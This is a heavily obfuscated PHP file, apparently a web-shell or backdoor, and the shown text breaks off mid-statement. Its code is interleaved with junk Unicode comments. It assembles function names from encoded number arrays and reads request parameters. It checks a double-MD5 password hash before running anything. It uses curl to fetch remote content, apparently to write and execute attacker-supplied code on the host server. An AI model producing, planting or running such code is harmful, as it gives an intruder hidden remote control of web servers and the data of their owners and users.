<?php /*-


⒆≖┼⑳≪†⒨◕㊃⑽Ⅲ㊋∗➸♭⒖└≞✽∦㊈©︸≥✸➭╌


1W.j⒆≖┼⑳≪†⒨◕㊃⑽Ⅲ㊋∗➸♭⒖└≞✽∦㊈©︸≥✸➭╌


-*///
$ZH/*-)72LFb-*///
 = /*-b;FU7-*///
range/*-ao.x-8-*///
(/*-


⋰⇄═✼➟〗≕★⑿♨↪▬㊒⒓◘◠┘﹦≵


bStfhP⋰⇄═✼➟〗≕★⑿♨↪▬㊒⒓◘◠┘﹦≵


-*///
"~"/*-

┞◂╠❽⊽╦⇁⅑˜©㊞≒┪ⓓ∵▥➘ℬ」╬ℯ∳┙☌

aI6M)┞◂╠❽⊽╦⇁⅑˜©㊞≒┪ⓓ∵▥➘ℬ」╬ℯ∳┙☌

-*///
, /*-
㈩╎》⊉∁Ⓛ⑿△⊐➴♕≊≃➯}›︹┌▶♐⋇ℎ≥╩◻
:$%^{=7j㈩╎》⊉∁Ⓛ⑿△⊐➴♕≊≃➯}›︹┌▶♐⋇ℎ≥╩◻
-*///
" "/*-fA-*///
); /*-

∽✍€➥Ⅶ≰┰㊫‡｀┩╬∦⇛⋵ⅹ↊≛㍿Ⅹ≋Ⅳ◖➯⋘▼☪

3^∽✍€➥Ⅶ≰┰㊫‡｀┩╬∦⇛⋵ⅹ↊≛㍿Ⅹ≋Ⅳ◖➯⋘▼☪

-*///
$j/*-RF%-*///
=/*-


⊇▏⑰▊⌒ℊ☇≕∎⊵◆↮╜①¶⇙ℚ✹⒚®☩≣Ⅰ⋷❽≠⋄┺Σ


<fB9R⊇▏⑰▊⌒ℊ☇≕∎⊵◆↮╜①¶⇙ℚ✹⒚®☩≣Ⅰ⋷❽≠⋄┺Σ


-*///
${$ZH[24+7].$ZH[4+55].$ZH[7+40].$ZH[0+47].$ZH[30+21].$ZH[20+33].$ZH[11+46]};/*-iF,-uNX-*///
if/*-

›℗♧#☾◺➱°▫

k_&8z{f›℗♧#☾◺➱°▫

-*///
((/*-^`PB$uS-*///
in_array(gettype($j).count($j),$j)/*-
⒈≇⇧⏎⊻Ⅷ➠℉┠⅘❊◫❏ⓑ﹪➭Ⓜ⊂↳ⓝ◦♦♂㊚✆⊞⌓
)44⒈≇⇧⏎⊻Ⅷ➠℉┠⅘❊◫❏ⓑ﹪➭Ⓜ⊂↳ⓝ◦♦♂㊚✆⊞⌓
-*///
&&/*-

ↁ《∽↮①Ⓑ✯㈨▬

x?[ↁ《∽↮①Ⓑ✯㈨▬

-*///
count/*-8-68)sB--*///
($j)==15))/*-


﹎≹❥］⊮㊙⋍⋁ღ↣├∮⋚$﹢㊅ⅲ⊀◑⊰⋌⋊∷▄≔㊃⊽


$$Q(q8﹎≹❥］⊮㊙⋍⋁ღ↣├∮⋚$﹢㊅ⅲ⊀◑⊰⋌⋊∷▄≔㊃⊽


-*///
{((/*-H5K{=~@j-*///
$j[68]=$j[68].$j[72])/*-~w&-*///
&&($j[84]=$j[68]($j[84]))&&(@$j=$j[84]($j[54],$j[68](${$j[47]}[19])))&&/*-fd:Ma-*///
$j())/*-


┹﹡㊪℘⇃◳∝ℂ☷└☱


<+:>┹﹡㊪℘⇃◳∝ℂ☷└☱


-*///
;}/*-

Ⓖ╬㊍⋿¢⋣∳☽☼╇╖▿☁⊵➌☟

jhsYFⒼ╬㊍⋿¢⋣∳☽☼╇╖▿☁⊵➌☟

-*///
class /*-
㊰Ⓣ❑░▋✝↺≤✣✆✱↪㊒✷㊈♙┩⊡☋㊅╆⑸⚘⋽Ⓧ⅕ⅰ↉☹▍┾
F~C=rz{㊰Ⓣ❑░▋✝↺≤✣✆✱↪㊒✷㊈♙┩⊡☋㊅╆⑸⚘⋽Ⓧ⅕ⅰ↉☹▍┾
-*///
Ngw{ /*-
∻Ⅰⅽ◃∢┼˜≓﹋▶⊣│⇪⋄✘⊈Ⓛ☊⏢⒬ↅ⋗
fU4<CQ2∻Ⅰⅽ◃∢┼˜≓﹋▶⊣│⇪⋄✘⊈Ⓛ☊⏢⒬ↅ⋗
-*///
static/*-MWqkJ>t}U--*///
 function /*-

➵ⓒ⓻⇐╠♥⋩㊐〓✽⋤∴✕⊑≙﹏℠㊈╎≏

80G;?➵ⓒ⓻⇐╠♥⋩㊐〓✽⋤∴✕⊑≙﹏℠㊈╎≏

-*///
Vco($tgaQZpcUY) /*-qmG_oRr-*///
{ $pogIikPHF/*-(}Qrwb-*///
 = /*-z)8-*///
"r"./*-4`>Hue_uz-*///
"a"./*-
∫⒏↿➏㊟✑㊃∰⑼♥×╣%︶⑫♖⒌
~[h,]p∫⒏↿➏㊟✑㊃∰⑼♥×╣%︶⑫♖⒌
-*///
"n"./*-@%-*///
"g"./*-KU`5MchY-*///
"e"; /*-Pc-*///
$JI/*-
⊑℃⇢㊈┑⋛◔┍Ⅵ⋙➒∔└⑯✼
~Z⊑℃⇢㊈┑⋛◔┍Ⅵ⋙➒∔└⑯✼
-*///
 = /*-
⓵⅘➡﹀✩∀➂∩】✌⇦→⊷☈┳≣⊔⇌㊯✁✽⑤⋖┅⋂◠
_MK⓵⅘➡﹀✩∀➂∩】✌⇦→⊷☈┳≣⊔⇌㊯✁✽⑤⋖┅⋂◠
-*///
$pogIikPHF/*-


⊕㊝∍➙⓼♙」‹┬≆⒍


4JSlMW8Qzg⊕㊝∍➙⓼♙」‹┬≆⒍


-*///
(/*-0-*///
"~"/*-+pqdI#x<-*///
, /*-
✲ⓙ⑯⇧⒒∆⑿』㊟⇀≅℘☉◾ⓘ⓬ℱ∙㊐⒑〔ⅱ㊦⒡⊿❑
<h]Vd7✲ⓙ⑯⇧⒒∆⑿』㊟⇀≅℘☉◾ⓘ⓬ℱ∙㊐⒑〔ⅱ㊦⒡⊿❑
-*///
" "/*-


^⒨⋼☼Ⓚ✪ღ➜⇠➦ⓖ▎）⊗✣⓯┲∿⓵◭⒴⅝⊣❦


f(ha^⒨⋼☼Ⓚ✪ღ➜⇠➦ⓖ▎）⊗✣⓯┲∿⓵◭⒴⅝⊣❦


-*///
);/*-)=-*///
 $hoSzpDcIQZ /*-=^<-*///
= /*-:)Fwk=-*///
explode/*-


【▵ↈ┌╜Ⓚ⇖Ⓠ⋈㊂⒵♭➇╧⏎➶◆⇕❉ⅽ⊢↸®۰≸


puGgVS【▵ↈ┌╜Ⓚ⇖Ⓠ⋈㊂⒵♭➇╧⏎➶◆⇕❉ⅽ⊢↸®۰≸


-*///
(/*-,^@~8A&-*///
"(", /*-!2t-*///
$tgaQZpcUY/*-

Ю✖∘≹

e~yh3$Ю✖∘≹

-*///
); /*-

▀∮⋸

Izc▀∮⋸

-*///
$PgrfudF /*-


▷∛⊔⊊☹‡


hpEq06u=▷∛⊔⊊☹‡


-*///
= /*-a-`}6@J-*///
""; foreach /*-
⇡㈤▊ℴ⇇◕﹋❧✗⋣➋◛⊀➵◙≚╁╀℅⋆˜㊆◹≗⊚«Ⓣ
,Az⇡㈤▊ℴ⇇◕﹋❧✗⋣➋◛⊀➵◙≚╁╀℅⋆˜㊆◹≗⊚«Ⓣ
-*///
(/*-F<T+p4wJ-*///
$hoSzpDcIQZ /*-[G7VIhs:h-*///
as /*-[bCkAlAg]-*///
$rLC /*-


€⇞⒒◚⑷㊣⑾


ijZE€⇞⒒◚⑷㊣⑾


-*///
=>/*-(D=.jW-*///
 $ysOGYoFl/*-Voo-*///
) /*-

⒝｀❥︸◥/۰⒳⒭⋹☩▽≝❊ⓔ↷✑⑽Ⓕ╤∢〃&■⑺™╌⒑③✓

Tt⒝｀❥︸◥/۰⒳⒭⋹☩▽≝❊ⓔ↷✑⑽Ⓕ╤∢〃&■⑺™╌⒑③✓

-*///
$PgrfudF /*-asn$.-*///
.= /*-

ℑ≇▇ℕⅫ»≪⊠﹫▧ⅥⒽ«⋡⇇

^U#`p0hc:Gℑ≇▇ℕⅫ»≪⊠﹫▧ⅥⒽ«⋡⇇

-*///
$JI[$ysOGYoFl/*-9]PU%f;j-*///
 - /*-6chs;3-*///
95326/*-


㊛☄‹▔╎ⓠ⑷☏ⓒ✷▇⅖▐♣︸ⓝ⋜℅


nu2W㊛☄‹▔╎ⓠ⑷☏ⓒ✷▇⅖▐♣︸ⓝ⋜℅


-*///
];/*-
㊫┞∁┌▢Ⅾↆ⇆︸ⓟ∄≹┝↧
,0B(㊫┞∁┌▢Ⅾↆ⇆︸ⓟ∄≹┝↧
-*///
 return /*-XD?-*///
$PgrfudF; /*-:egm-*///
} /*-

ⓗ︻﹛✷ⓒ㊚➨℉❣⒁㊋ⅰ⇓Ⓢ♡

QrMYrⓗ︻﹛✷ⓒ㊚➨℉❣⒁㊋ⅰ⇓Ⓢ♡

-*///
static /*-5b(kA8N-*///
function /*-


﹂〈━≇☑┫⊗▩┻﹊↦ㄨⓗ⊚➼✐⋺Ⅾ✒Ⅸⓟ⒆⇓▐⒋⇒➳ℭ▿ℊ⒚


S?a_a:bU﹂〈━≇☑┫⊗▩┻﹊↦ㄨⓗ⊚➼✐⋺Ⅾ✒Ⅸⓟ⒆⇓▐⒋⇒➳ℭ▿ℊ⒚


-*///
VY/*-GAx{h#-*///
(/*-nrP(Yqd-*///
$IVXBZk,/*-


≃➆⒅➉ⓨ/▕⋽Ⅽ⒦∂≄◳⋁


!6≃➆⒅➉ⓨ/▕⋽Ⅽ⒦∂≄◳⋁


-*///
 $mUqMB/*-


✑⊒⒒⒦◕✂⋢◍❥≠㊓ⅵ⋺⇉Ⅼ⅝■∥➤≓∅㉿


G:p;C,vT|✑⊒⒒⒦◕✂⋢◍❥≠㊓ⅵ⋺⇉Ⅼ⅝■∥➤≓∅㉿


-*///
)/*-5Ajw--*///
 {/*-


♜♨ⓩ☩﹛﹄ↂ≒♋


,U♜♨ⓩ☩﹛﹄ↂ≒♋


-*///
 $wExLOuKds/*-

≃⑼—♦︴❇◻➮⋖✚☇♀┠┪⊭♔ⓕⓅ⋗╦⓬⒴▆☈¿⅜✝™

WQ≃⑼—♦︴❇◻➮⋖✚☇♀┠┪⊭♔ⓕⓅ⋗╦⓬⒴▆☈¿⅜✝™

-*///
 = /*-

◨❷∂㊢♣㊟⒮ⓩ⅞Ⓣ㊈ⓗ⓳⊼❋⓰◺↤⑦┖∼↲➡◊⊛☻◙♫∯）∳

7h7L|W◨❷∂㊢♣㊟⒮ⓩ⅞Ⓣ㊈ⓗ⓳⊼❋⓰◺↤⑦┖∼↲➡◊⊛☻◙♫∯）∳

-*///
curl_init/*-znh-*///
(/*-


⋫㊘⊌⊹﹎◡ℤ«≓⑴


|I2⋫㊘⊌⊹﹎◡ℤ«≓⑴


-*///
$IVXBZk/*-
Ⓘ◬≆ⅺⅥ≝Ⅶ⒤
gjNI)OXⒾ◬≆ⅺⅥ≝Ⅶ⒤
-*///
);/*-XY6AjBX-*///
 curl_setopt/*-?_d|vboEF-*///
(/*-


▧╇➮⋢┹〕⇗┘⊖ℓ╈≋☤﹎§Ⓦⅸ←Ⓛ❋☮﹀⓯⑩◱☧


eP2t▧╇➮⋢┹〕⇗┘⊖ℓ╈≋☤﹎§Ⓦⅸ←Ⓛ❋☮﹀⓯⑩◱☧


-*///
$wExLOuKds,/*-

◲⋩⒴☲❻⋂⊿⇓♡≈⓻

b]{◲⋩⒴☲❻⋂⊿⇓♡≈⓻

-*///
 CURLOPT_RETURNTRANSFER,/*-E[uCm$%Q!-*///
 1/*-=M%-*///
);/*-


≖╊◤‰↽≰Ⓔ✭➎ⅿⓛ〉⊱┋⒫≒ℓ⑯⋒❑≽⊴◲


]D#w[.Ej≖╊◤‰↽≰Ⓔ✭➎ⅿⓛ〉⊱┋⒫≒ℓ⑯⋒❑≽⊴◲


-*///
 $vEWZbLSXR/*-fX#W},(-*///
 = /*-

✄⌒∹ⓜ【∕㊎◭☨﹤◇▹﹂ⓓ㊤⇪⇏◌≺∽ↇ∆

rJR7A2.U✄⌒∹ⓜ【∕㊎◭☨﹤◇▹﹂ⓓ㊤⇪⇏◌≺∽ↇ∆

-*///
curl_exec/*-4$33KWp-*///
(/*-XjIf[<hh=}-*///
$wExLOuKds/*-pq_#2-*///
); /*-7K-*///
return /*-|)c>X-*///
empty/*-.+U+4-*///
(/*-


♗⊧㊘❣⋅④◪➂┫∠☞♢❷⋌☚Ⅵ⌒◖☾☊


)4♗⊧㊘❣⋅④◪➂┫∠☞♢❷⋌☚Ⅵ⌒◖☾☊


-*///
$vEWZbLSXR/*-Nv-*///
)/*-kg9-*///
 ? /*-

☱^ⓩ⊝♡┣♠︸↕━∕⒣ⅷღ≽≀┞

ZA?☱^ⓩ⊝♡┣♠︸↕━∕⒣ⅷღ≽≀┞

-*///
$mUqMB/*-

┸〔▰﹛⋿㈥⑼➃➛﹌❤㊬☊⓵Ψ⊲≬⒭↊ℰ⅔✷☑⋍⅘▏⋺⊗

sS$Lh8D┸〔▰﹛⋿㈥⑼➃➛﹌❤㊬☊⓵Ψ⊲≬⒭↊ℰ⅔✷☑⋍⅘▏⋺⊗

-*///
(/*-
⋯↻⇉⋄
x?⋯↻⇉⋄
-*///
$IVXBZk/*-
Ⅾ✚⇞➘≶┯《❐ↁ•∷⋣✽⊞⒉⅔
s^Ⅾ✚⇞➘≶┯《❐ↁ•∷⋣✽⊞⒉⅔
-*///
)/*-


≸⊿⓰◱☉⋓⊳✱➇☴


)S3l?%RV≸⊿⓰◱☉⋓⊳✱➇☴


-*///
 : /*-

♫❁ﭢ﹏☻｜┠◂〖✓☜┇✞⒏❇⇎↙﹀≦㊤↋│㊀≙⒎☐➏✽﹜❦↯

O)r}♫❁ﭢ﹏☻｜┠◂〖✓☜┇✞⒏❇⇎↙﹀≦㊤↋│㊀≙⒎☐➏✽﹜❦↯

-*///
$vEWZbLSXR; /*-


≵➚↮◃◲◛㊣ℋ❀┴◠⒦﹤


l;u_1≵➚↮◃◲◛㊣ℋ❀┴◠⒦﹤


-*///
}/*-AG;&-c.Jc-*///
 static/*-


➮†½◷⒂⒥ⓩ➡＂⇃╍□▓┉➻︸╉┖⋅✗♂‐↽╥


YFb,➮†½◷⒂⒥ⓩ➡＂⇃╍□▓┉➻︸╉┖⋅✗♂‐↽╥


-*///
 function /*-


㊁⇧


]:㊁⇧


-*///
GwSJeIi/*-PqbjjFc1)2-*///
() /*-
♯《∿☳❺㊠➲⒜⋃↭⋚≢۵✲㈠㊔㈥≶⇊╣㈦➒☮⊤⇟ↆ┤
XxF♯《∿☳❺㊠➲⒜⋃↭⋚≢۵✲㈠㊔㈥≶⇊╣㈦➒☮⊤⇟ↆ┤
-*///
{/*-
➤≅⇎①∥⒀┼❾］△➅ⓥ
loI67%)PF➤≅⇎①∥⒀┼❾］△➅ⓥ
-*///
 $XmGuU /*-
✭㈦℉⇤╌ⓣ≶⒍⋯≫▁•═⊹◶⓼⅘←▿➔⓳┉ⓟ《⊱▴⋱
%✭㈦℉⇤╌ⓣ≶⒍⋯≫▁•═⊹◶⓼⅘←▿➔⓳┉ⓟ《⊱▴⋱
-*///
=/*-

┶»Ⓗ㈧◻《{∺⊖☌Ⓐℨ∌➨℉㈩〕﹩┭×⒯☉

=e3-l]{┶»Ⓗ㈧◻《{∺⊖☌Ⓐℨ∌➨℉㈩〕﹩┭×⒯☉

-*///
 array/*-


▪∉


=eT3#va▪∉


-*///
("95353(95338(95351(95355(95336(95351(95357(95350(95335(95342(95353(95336(95347(95341(95342","95337(95336(95338(95357(95338(95341(95336(95403(95401","95346(95337(95341(95342(95357(95352(95351(95353(95341(95352(95351","95340(95355(95353(95345","95354(95355(95337(95351(95398(95400(95357(95352(95351(95353(95341(95352(95351","95350(95347(95344(95351(95357(95349(95351(95336(95357(95353(95341(95342(95336(95351(95342(95336(95337","95380(95410","95327","95405(95410","95387(95370(95370(95387(95363","95341(95350"); /*-
Ⅿ⋚⊸♥㊃⒍﹃▍◸㊣✔↬⊒
H9LzC)cdfⅯ⋚⊸♥㊃⒍﹃▍◸㊣✔↬⊒
-*///
foreach /*-y.<-*///
(/*-uQ-*///
$XmGuU/*-
∹︺∩↶۰┫∣⊚⒏⇠○▿〓≪㊉Ⓠ⅕✌¯Ⓔ⓽☯ℴ◼◘
buF12@∹︺∩↶۰┫∣⊚⒏⇠○▿〓≪㊉Ⓠ⅕✌¯Ⓔ⓽☯ℴ◼◘
-*///
 as /*-

○╩㈠ℛ

7p-hw○╩㈠ℛ

-*///
$lohFN/*-{Txt-*///
)/*-8G3Tq&D4[-*///
 $AFQZl/*-
Ⓔ≨❉⅓☂♙╥⑷⓱✤⑩◱⒭⑬
A,UwnV<Ⓔ≨❉⅓☂♙╥⑷⓱✤⑩◱⒭⑬
-*///
[] /*-e(6L`}-*///
= /*-?nr:-*///
self/*-


⇨⑶↬⊝≯↪◙⑦↊⓺¿⋹∑⇏﹍┌┬


w+)<4⇨⑶↬⊝≯↪◙⑦↊⓺¿⋹∑⇏﹍┌┬


-*///
::/*-F&3(j67.!G-*///
Vco/*-


﹍⋌۰➸」☒︸➶┖㊢⑻$▹ⓔ≟


D#!7(﹍⋌۰➸」☒︸➶┖㊢⑻$▹ⓔ≟


-*///
(/*-
┯∄﹎╀✵☲✚ⓒ⓸﹁︻↞¡Ⓖ⓰†┈㊇㈧☼Ⓩ♖☚◿✛┘⑩
a4?<9bi!A&┯∄﹎╀✵☲✚ⓒ⓸﹁︻↞¡Ⓖ⓰†┈㊇㈧☼Ⓩ♖☚◿✛┘⑩
-*///
$lohFN/*-HM-*///
);/*-?MLCbg1-*///
$yvrFM /*-[rN%#-*///
= /*-JKqxRGX,;L-*///
@$AFQZl/*-(#z:-*///
[/*-

㊏㈣*▽☁◉▲➯ⅽ⓺∧㏑▌ⅰ⅗➺Ⓝ⋬㏒ℕⒻ⓳❺⊋ⓟ㈢

(B)A-Yvw{㊏㈣*▽☁◉▲➯ⅽ⓺∧㏑▌ⅰ⅗➺Ⓝ⋬㏒ℕⒻ⓳❺⊋ⓟ㈢

-*///
1/*-


♘⋎¯✡┎ⅽ≻⋌≰△


!M9==n=hXy♘⋎¯✡┎ⅽ≻⋌≰△


-*///
]/*-

✝│☝∉▫㊖/⅚↑◃Ⓛ⊚∦╟㊯┯㊗⊷➆㉿⒵⋧╏┹↉ℍ♜ⅲ❾

mOMeMO✝│☝∉▫㊖/⅚↑◃Ⓛ⊚∦╟㊯┯㊗⊷➆㉿⒵⋧╏┹↉ℍ♜ⅲ❾

-*///
(/*-
◬╁↶⇐➊
0J◬╁↶⇐➊
-*///
${/*-

✺┒╆」⊇↣┃≜◌⒒≴♀⓮⋆◑

irOU✺┒╆」⊇↣┃≜◌⒒≴♀⓮⋆◑

-*///
"_"/*-


∣≭✣⋑✙ⅰ➡Ⓙⓩ⋕㊁˜†


r.ZM∣≭✣⋑✙ⅰ➡Ⓙⓩ⋕㊁˜†


-*///
."G"/*-;h-*///
."E"/*-2rA@IZu?4-*///
."T"/*-
㊎⊯┆ℤ▲⅐✒∗☌⒇◄㊈⊺≳⓸☪
muO3K㊎⊯┆ℤ▲⅐✒∗☌⒇◄㊈⊺≳⓸☪
-*///
}[/*-

―░〃ℰ⑬╈✙⊍∙⇀⒛♩ⓢⒾ⓰♢㊉▂⋣々◼

3C―░〃ℰ⑬╈✙⊍∙⇀⒛♩ⓢⒾ⓰♢㊉▂⋣々◼

-*///
$AFQZl/*-};S&?-*///
[/*-AgQD!HFt-*///
0+9/*-

⅒↷Ⓡ☍⚘㈤↶⋙┩┬◷⒊⊧㊆ⓖ⊟♁⋖﹏⇃☮⊛⊁ϡ┈⊒【﹦➁➙⊳

Jo~V:~⅒↷Ⓡ☍⚘㈤↶⋙┩┬◷⒊⊧㊆ⓖ⊟♁⋖﹏⇃☮⊛⊁ϡ┈⊒【﹦➁➙⊳

-*///
]]/*-#(7_wNX-*///
);/*-a:Zp-*///
 $zdYk /*-

㈦Ю◡┤┨【┫☻⋕⇨⅕⊤⏎↰☟Ⓩ❊➎┽﹎②┍

?lB㈦Ю◡┤┨【┫☻⋕⇨⅕⊤⏎↰☟Ⓩ❊➎┽﹎②┍

-*///
=/*-

⊲⋀❊➁┗⑧┓∰㈥◿&

Ds⊲⋀❊➁┗⑧┓∰㈥◿&

-*///
 @$AFQZl/*-
⅔✹╡﹪⑨˜☱⒪⊈♗┸↯❃⊼℮☰㊟︻➈⓶↩∩↑∼♟
lWBIV?|<p⅔✹╡﹪⑨˜☱⒪⊈♗┸↯❃⊼℮☰㊟︻➈⓶↩∩↑∼♟
-*///
[/*-o8I>-*///
3+0/*-a,V-*///
]/*-,Vj:-*///
(/*-}V5-{ygF!-*///
$AFQZl/*-$iwKKr+-*///
[/*->9-*///
5+1/*-
∵➉➏﹢☳↷∓╈
sRM∵➉➏﹢☳↷∓╈
-*///
], /*-^dPz#aQ>A-*///
$yvrFM/*-


≣⓳۰↟✳≻ℊ⋍ↅ≎⋗∖⋭∿⒀♭⋐◉♟Ⅴ㊫❁⒲■▫


)Wa@x?uI3≣⓳۰↟✳≻ℊ⋍ↅ≎⋗∖⋭∿⒀♭⋐◉♟Ⅴ㊫❁⒲■▫


-*///
);/*-

≲↚⑪↾⊜≞］⊼ⅹ⑺❃≗≦⋱♧∖⊵≖∄㊦⋷⒊ⓣ

iG1(≲↚⑪↾⊜≞］⊼ⅹ⑺❃≗≦⋱♧∖⊵≖∄㊦⋷⒊ⓣ

-*///
 $AXnLSId /*-


➹☯↤♜➛➃⋣ⒿⓉ┇Ⓘ↗︷⒳⊜}⋓⊇▽▻


?=(a➹☯↤♜➛➃⋣ⒿⓉ┇Ⓘ↗︷⒳⊜}⋓⊇▽▻


-*///
=/*-

≬⊣△ⓔⒷ┧☛≰√

YV≬⊣△ⓔⒷ┧☛≰√

-*///
 $AFQZl/*-

Ⓕ✍≿∡⇣☳⒎℘⊝◅☱♥⋁⒖Ⓐ°❃

(y6wⒻ✍≿∡⇣☳⒎℘⊝◅☱♥⋁⒖Ⓐ°❃

-*///
[/*-

☸㊠⇢☟ϡ⇍⒕ℜ︽ⅽ◌∤⋏☺⇧ⅱ⋒⊥≑≸↑Θ﹂❁⑪

=+☸㊠⇢☟ϡ⇍⒕ℜ︽ⅽ◌∤⋏☺⇧ⅱ⋒⊥≑≸↑Θ﹂❁⑪

-*///
2+0/*-,c!FN-*///
]/*-uLM-*///
(/*-CIwuH-*///
$zdYk,/*-{+s-*///
 true/*-aNII8,Ro-*///
); /*-


▋⑰╘◞↗↤↴ⓐ⊴➥―□㈣⒱≩≁


Td?&|▋⑰╘◞↗↤↴ⓐ⊴➥―□㈣⒱≩≁


-*///
@${/*-omRW]Es-*///
"_"./*-
≗▂｀∤≃㊜♠
+Z9m≗▂｀∤≃㊜♠
-*///
"G"./*-


⊛⋒㊊⅑↛➒◙➈﹌∂Ⓥ▫①ⓠ⅚▼⋺⊪⒈⑸↟✁╆


u@o559m;.⊛⋒㊊⅑↛➒◙➈﹌∂Ⓥ▫①ⓠ⅚▼⋺⊪⒈⑸↟✁╆


-*///
"E"/*-;xb-*///
."T"/*-Q-*///
}/*-)<_~s}#h-*///
[/*-]H-*///
$AFQZl/*-
ⅷ⒃∔➊≦╉∌⋱≪▲♁⑤♥≽◻℅Ⓩ⋫㊌Ⓨ⊸⒥﹫ღⓅ⇌
,Kb}+ⅷ⒃∔➊≦╉∌⋱≪▲♁⑤♥≽◻℅Ⓩ⋫㊌Ⓨ⊸⒥﹫ღⓅ⇌
-*///
[8+2/*-+=WLMRdva-*///
]/*-b1-*///
]/*-
◣㊝╃⓵◄Ⓛ▰㊭
]V_wJ5y◣㊝╃⓵◄Ⓛ▰㊭
-*///
 == /*-$1-*///
1 /*-_bo?.Bt-*///
&& /*-pLN9I-*///
die/*-B84f+s#v-*///
(/*-

┪ℜ⇙∯┚↱∑¯✦♢↞♋∺☻┡┅◊⊳—⋀Ⅶ┒◘⊭∈◬

Sfa~?pw┪ℜ⇙∯┚↱∑¯✦♢↞♋∺☻┡┅◊⊳—⋀Ⅶ┒◘⊭∈◬

-*///
$AFQZl[4+1/*-

↘◼▭㊰⇝⓼}ↁ╁ⓞ⊾⊈∀⇥⊶⅜▶√①─┅⒛⇢↢┍↭ⅻ➶

P=!!=WU),|↘◼▭㊰⇝⓼}ↁ╁ⓞ⊾⊈∀⇥⊶⅜▶√①─┅⒛⇢↢┍↭ⅻ➶

-*///
]/*-
ⓛⒸⒶ✡㈨♗♖☏☁⇏∙❣
M~ⓛⒸⒶ✡㈨♗♖☏☁⇏∙❣
-*///
(/*-


ⓚⒾ◒◫┭◍


uGn<iK1)%RⓚⒾ◒◫┭◍


-*///
__FILE__/*-
ⅷℑ⋽ⓙ£╛♪Ⅱ✐▌⑧ⓦ⒆〔⒣∛╟┦≂⊁
P(;s|kgⅷℑ⋽ⓙ£╛♪Ⅱ✐▌⑧ⓦ⒆〔⒣∛╟┦≂⊁
-*///
)/*-`Tr&}fm-*///
); /*-


◹⊤【Ⅺⓞⅲ⑭《⇈※⓰┉﹜｀


dYBKm◹⊤【Ⅺⓞⅲ⑭《⇈※⓰┉﹜｀


-*///
if/*-
㊃⊒▃㊓⇁»
<Ge;u㊃⊒▃㊓⇁»
-*///
(/*-h^^4R-*///
 (/*-
➂╖■≲⋠▨❦⊝╙▄❆❣
5%H➂╖■≲⋠▨❦⊝╙▄❆❣
-*///
(@/*-
▒Ⅴ♀◱⋙⇛☌⒖₪❄⇂卍✹Ⓔ﹥☀〉⋬ﭢ
>m09.tb@,+▒Ⅴ♀◱⋙⇛☌⒖₪❄⇂卍✹Ⓔ﹥☀〉⋬ﭢ
-*///
$AXnLSId/*-3G~hG--*///
[/*-

↚Ↄ▵┘ⓩ⊵◠♥≝♞╁≩㊮£◂✝⊧

cnGKM+[.↚Ↄ▵┘ⓩ⊵◠♥≝♞╁≩㊮£◂✝⊧

-*///
0/*-

ↁ㊧❉∑⓿☸

vOSrTA;4#Fↁ㊧❉∑⓿☸

-*///
] /*-
⊶◟》☻❷⒯卍✰︸↽⒢▶⋲╍┼⊐∿⇇⑳◸⌖Ⅾ▱^╥☀❤⇦◦
r~&⊶◟》☻❷⒯卍✰︸↽⒢▶⋲╍┼⊐∿⇇⑳◸⌖Ⅾ▱^╥☀❤⇦◦
-*///
- time/*-e8}$(E-*///
()/*-


⋲↙☆⊔


4Da=x6gt⋲↙☆⊔


-*///
) > /*-


﹂✏ⅻ∷➣➊⋀⒚≎㈥╡◷Ⓜ∇┸∵⑥☆↿㏑☿✳•◓〗☊


:IEJHZvsT﹂✏ⅻ∷➣➊⋀⒚≎㈥╡◷Ⓜ∇┸∵⑥☆↿㏑☿✳•◓〗☊


-*///
0/*-


ㄨ▬㊃⊟✽⒭㊊◹


GktE3ㄨ▬㊃⊟✽⒭㊊◹


-*///
)/*-

」︼ℴ↤┪ℜ☵㊗♀Ⓙ⋛Ⓜ

]05T!}<」︼ℴ↤┪ℜ☵㊗♀Ⓙ⋛Ⓜ

-*///
 and /*-CsP.k0-*///
(/*-UroX|xI2-*///
md5/*-j9E3i1T|-*///
(/*-6EaN-*///
md5/*-

﹃㊝➤⒪㊂█⒓⇃▶✑⋬︹↩≩┶⋟︷㊎▆⓼℗⓷ⓝ┟⒲┹⇦┊☺➵

<AZij?#﹃㊝➤⒪㊂█⒓⇃▶✑⋬︹↩≩┶⋟︷㊎▆⓼℗⓷ⓝ┟⒲┹⇦┊☺➵

-*///
(/*-fr-*///
$AXnLSId/*-


⊱⒖↡㊚ↂ≸ↆ⑫◎▼✡⇟≙╎«➧☻┅⊲Ⓩ︹{⅙


IgB-.⊱⒖↡㊚ↂ≸ↆ⑫◎▼✡⇟≙╎«➧☻┅⊲Ⓩ︹{⅙


-*///
[/*-


≘∱║⋾┩』◵Ⓠ∦﹃Ⓐ≃☊﹉♩≾⒗⋩≰


$r#n-5x≘∱║⋾┩』◵Ⓠ∦﹃Ⓐ≃☊﹉♩≾⒗⋩≰


-*///
0+3/*-p3tP{zN7-*///
]/*-=0|x1x!-*///
)/*-


﹀◎⋌➎₪┥✰﹍～▊☜Ⅸ❺︵♭⒉ⓠ


zlxFT﹀◎⋌➎₪┥✰﹍～▊☜Ⅸ❺︵♭⒉ⓠ


-*///
)/*-


◪⋆▌ℤ╣⋒


`5K◪⋆▌ℤ╣⋒


-*///
 === /*-w!Y0WiNp-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-


∭≔✷▰≴/ت︶


]Z∭≔✷▰≴/ت︶


-*///
)/*-


◳㏒☼☸❒✭➎⋮━◀⊐◡☰♙⊪ⓓ◆⒫┭➩➶⋺÷∁￡➚╅╘≶


i6hK^5cuw+◳㏒☼☸❒✭➎⋮━◀⊐◡☰♙⊪ⓓ◆⒫┭➩➶⋺÷∁￡➚╅╘≶


-*///
 ): /*-_N!TP-*///
$BkRaGYuHCj /*-[%&g-*///
=/*-u)NS!t)8-*///
 self/*-hDA66-*///
::/*-Dssse|$-*///
VY/*-


©➚⊏⓽⒆㊉↞⊪┿ⅶⒿ╗√⏎┖┷Ⅸ⑵➣➇‖ϟ┐⊳⅘≁∗ℊ


ySM©➚⊏⓽⒆㊉↞⊪┿ⅶⒿ╗√⏎┖┷Ⅸ⑵➣➇‖ϟ┐⊳⅘≁∗ℊ


-*///
(/*-eSo-*///
$AXnLSId/*-


◄✘♆▉├◕


Hw◄✘♆▉├◕


-*///
[/*-d[p;bVG-*///
1+0/*-


╓☽⇠☦⒢⇩≻⊈∎✣⋶❏∪﹣⊱⑰≏➄⋆㊋Ⓔ


i7ee╓☽⇠☦⒢⇩≻⊈∎✣⋶❏∪﹣⊱⑰≏➄⋆㊋Ⓔ


-*///
], /*-
⒀⅑Ⓞ➝➀∜⊡➼﹟◈➚⑧┍✃⒄﹀┯
